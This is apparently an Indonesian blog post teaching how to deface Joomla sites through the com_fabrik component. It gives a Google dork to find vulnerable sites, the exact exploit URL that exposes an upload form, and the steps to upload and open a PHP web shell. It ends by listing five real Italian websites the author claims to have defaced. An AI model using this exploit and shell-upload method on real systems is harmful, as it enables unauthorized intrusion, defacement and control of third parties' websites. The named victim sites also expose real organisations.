1. Ketik dork berikut ke google : inurl:index.php?option=com_fabrik
2. Akan ada banyak web, anda buka terserah yang mana
3. Masukkan exploit ini : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh : www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika tidak berhasil cari target lain. Jika berhasil akan muncul form upload seperti ini
6. Jika berhasil, buka shell anda dengan format www.site.com/media/namashell.php
7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.
Sekian ilmu yang dapat saya berikan.
Selamat mencoba ^_^
contoh web yang saya deface dengan metode ; com_fabrik
http://www.albertobertoli.it/media/rafli.html
http://www.ready4english.it/media/rafli.html
http://www.annalisacreazioni.it/media/rafli.html
http://www.adusbef.lombardia.it/media/rafli.html
http://www.europea-export.it/media/rafli.html
POC : COM_FABRIK ,,,,
Tidak ada komentar:
Posting Komentar
Jika Ada Yang Kurang Paham, Silahkan Berkomentar Dengan Sopan & Dapat Di Mengerti..